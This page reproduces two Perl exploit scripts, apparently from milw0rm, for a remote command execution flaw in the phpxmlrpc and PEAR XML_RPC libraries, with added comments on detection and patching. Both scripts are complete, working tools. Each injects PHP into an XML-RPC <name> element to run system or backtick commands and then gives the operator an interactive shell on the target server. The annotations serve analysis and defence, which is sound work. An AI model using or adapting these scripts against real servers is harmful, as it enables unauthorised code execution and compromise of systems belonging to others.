
xmlrpc.php Library <= 1.3.0 Remote Command Execution Exploit

Version 1



#!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************

use LWP::UserAgent;

# Defensive reading of this script: it is an ordinary HTTP POST of an XML-RPC
# methodCall whose only unusual feature is PHP-looking code inside a <name>
# element. The page title names xmlrpc.php library releases <= 1.3.0 as
# affected; the remedy is a library upgrade to a later release, and a
# <name> element containing quotes, parentheses, semicolons or "/*" is a
# reliable thing for request inspection to alert on.

# HTTP client reused for every request; the User-Agent is set to look like a
# browser (Internet Explorer 6.0) instead of LWP's default string.
$brws = new LWP::UserAgent;
$brws->agent("Internet Explorer 6.0");

# Sole argument: the full URL of the XML-RPC endpoint.
$host = $ARGV[0];

if ( !$host )
{
die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
}

# $host is never reassigned inside the loop, so this runs until the process is
# interrupted; there is no "exit" command.
while ( $host )
{

print "xmlrpc\@\#";

# One line from the operator, taken verbatim (no chomp) and interpolated
# straight into the XML body below.
$exec = <STDIN>;
# methodCall for an arbitrary method name ("foo.bar"); the four <string>
# params are filler. The injection point is the <name> element of the last
# param: `','')` appears intended to close a quoted string and call in code
# the vulnerable library builds from the request (presumably then eval'd),
# `system('$exec')` runs the operator's input on the server, `die;` stops the
# script and `/*` comments out whatever the library appends afterwards.
$data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";

# Plain POST of the XML body; no Content-Type header is set, which is itself
# atypical for XML-RPC traffic and easy to notice server-side.
$send = new HTTP::Request POST => $host;
$send->content($data);
$gots = $brws->request($send);
$show = $gots->content;

# If the response contains "<b>NNN</b><br />" (the shape of PHP's HTML-formatted
# warning text, "... on line <b>N</b><br />"), print only what follows it,
# presumably the command output; otherwise dump the whole response body.
if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
{
    print $2 . "\n";
}
else
{
 print "$show\n";
}


}



Source: http://www.milw0rm.com/id.php?id=1084


Version 2



#-------------------------------------------------------#
#                     /|                                #      
#                    | |                                #      
#                    | |                                #      
#       /\   ________| |___                             #      
#      /  \  \_______   __/                             #
#     /    \|\_____  | | _       _  _     _  ()___      #      
#    /  /\  \  ___ \ | |<_>  /  |  |  | || \ || | | |   #      
#   /  /__\  \|   \ || | _  /__ |_ |  | ||_/ || | |_|   #      
#  /  ______  \   | || || |   / |  |  | || \ || |   |   #      
# /  /      \  \  | || || |  /  |_ |_ |_||  \|| | \_|   #      
# \_/       |\_/  | || || | ___ _  _                    #      
#           | |   | || /| |  | |  | ||\/|               #      
#            \|    \||/  \|  | |_ |_||  |               #      
#                            | |  | ||  |               #      
#                            | |_ | ||  |               #      
#                                                       #
#         Original advisory by http://gulftech.org/     #
#         Exploit coded by dukenn (http://asteam.org)   #
#                                                       #
#-------------------------------------------------------

#!/usr/bin/perl

use IO::Socket;

print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";

# Both arguments are required: the target host name and the URL path of the
# XML-RPC endpoint on it.
if ($ARGV[0] && $ARGV[1])
{
$host = $ARGV[0];
$xml = $ARGV[1];
# One raw TCP connection to port 80 (hard-coded) is opened here and reused for
# every command in the loop below; HTTP is then spoken by hand.
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n";
while (1) {
   print '['.$host.']# ';
   # chop() drops the last character of the line (the trailing newline from the
   # terminal); typing "exit" ends the session.
   $cmd = <STDIN>;
   chop($cmd);
   last if ($cmd eq 'exit');
   # Same injection technique as the first script on this page: the <name>
   # element carries `',''))` to break out of the string and call the
   # vulnerable library appears to build from the request, then PHP that echoes
   # "_begin_" / "_end_" marker lines around the backtick-executed command so
   # the client can locate the output in the response, exits, and uses `/*` to
   # comment out the remainder. "test.method" is an arbitrary method name.
   # For detection: those marker strings in a response body, or code
   # characters inside a <name> element, do not occur in legitimate XML-RPC.
   $xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_\n';echo `".$cmd."`;echo '_end_';exit;/*</name></value></param></params></methodCall>";
   # Hand-built HTTP/1.1 POST: Host, Content-Type and a Content-Length computed
   # from the payload; header lines are terminated with bare "\n".
   print $sock "POST ".$xml." HTTP/1.1\n";
   print $sock "Host: ".$host."\n";
   print $sock "Content-Type: text/xml\n";
   print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
   # Scan the response line by line: output is whatever lies between the
   # "_begin_" and "_end_" lines the payload asked the server to echo. If
   # "_begin_" never arrives, the injected code did not run (or its output did
   # not come back) and the tool gives up.
   $good=0;
   while ($ans = <$sock>)
      {
       if ($good == 1) { print "$ans"; }
       last if ($ans =~ /^_end_/);
       if ($ans =~ /^_begin_/) { $good = 1; }
      }
     if ($good==0) {print "Exploit Failed\n";exit();}
  }
}
else {
print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n";
print "Example: perl xml.pl target.com /script/xmlrpc.php\n";
exit;
}



Source: http://www.milw0rm.com/id.php?id=1083